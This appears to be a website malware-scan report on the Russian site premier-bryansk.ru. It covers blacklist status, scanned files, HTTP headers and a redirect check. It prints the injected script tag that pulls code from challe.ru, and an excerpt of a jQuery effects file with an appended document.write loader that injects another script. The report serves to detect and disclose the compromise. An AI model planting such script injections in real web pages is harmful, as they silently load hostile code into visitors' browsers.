Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=premier-bryansk.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://premier-bryansk.ru/
Result: The website is marked by Yandex as suspicious: visiting this website may harm your computer.
Scanned pages/files
Request | Server response | Status
--- | --- | ---
http://premier-bryansk.ru/ | 200 OK; Content-Length: 7638; Content-Type: text/html | suspicious
http://premier-bryansk.ru/js/jquery-1.11.1.min.js | 200 OK; Content-Length: 95786; Content-Type: application/x-javascript | clean
http://premier-bryansk.ru/js/jquery.jcarousel.min.js | 200 OK; Content-Length: 17169; Content-Type: application/x-javascript | clean
http://premier-bryansk.ru/js/waypoints.min.js | 200 OK; Content-Length: 8044; Content-Type: application/x-javascript | clean
http://premier-bryansk.ru/js/main.js | 200 OK; Content-Length: 1480; Content-Type: application/x-javascript | clean
http://challe.ru/zhbymnyr.php?id=6931251 | 200 OK; Content-Length: 1; Content-Type: text/html | clean
http://challe.ru/test404page.js | 404 Not Found; Content-Length: 83050; Content-Type: text/html | clean
http://challe.ru/jscookmenu.min.js | 200 OK; Content-Length: 19377; Content-Type: application/x-javascript | clean
http://challe.ru/./index.html | 200 OK; Content-Length: 80198; Content-Type: text/html | clean
http://challe.ru/./jscookmenu.min.js | 200 OK; Content-Length: 19377; Content-Type: application/x-javascript | clean
http://challe.ru/./jquery-1.7.2.min.js | 200 OK; Content-Length: 94914; Content-Type: application/x-javascript | clean
http://challe.ru/./jquery.effects.core.min.js | 200 OK; Content-Length: 10685; Content-Type: application/x-javascript | malicious
http://challe.ru/./wb.carousel.min.js | 200 OK; Content-Length: 5206; Content-Type: application/x-javascript | clean
http://challe.ru/././pack.html | 200 OK; Content-Length: 56234; Content-Type: text/html | clean
http://challe.ru/././jscookmenu.min.js | 200 OK; Content-Length: 19377; Content-Type: application/x-javascript | clean

Detail for http://premier-bryansk.ru/ (suspicious). Suspicious code found: an external script tag pulling JavaScript from the third-party host challe.ru:
<script type="text/javascript" src="http://challe.ru/zhbymnyr.php?id=6931230"></script>

Detail for http://challe.ru/./jquery.effects.core.min.js (malicious). Malicious code, confirmed by antiviruses (see below). The scanner's excerpt of the file (truncated as reported) ends with an appended document.write call that injects a further script tag, loading /css/brisa.js, into the including page:
jQuery.effects||function(a,b){function c(b){var c;return b&&b.constructor==Array&&b.length==3?b:(c=/rgb\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*\)/.exec(b))?[parseInt(c[1],10),parseInt(c[2],10),parseInt(c[3],10)]:(c=/rgb\(\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*\)/.exec(b))?[parseFloat(c[1])*2.55,parseFloat(c[2])*2.55,parseFloat(c[3])*2.55]:(c=/#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/.exec(b))?[parseInt(c ;document.write("<scr"+"ipt src='/css/brisa.js'><"+"/script>");
Antivirus reports:
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: premier-bryansk.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 06 Sep 2014 03:23:24 GMT
Server: nginx/1.4.4
Content-Length: 7638
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.2.17-pl0-gentoo
...7638 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: premier-bryansk.ru
Referer: http://www.google.com/search?q=premier-bryansk.ru
Result:
The result is similar to the first query. No suspicious redirects were found.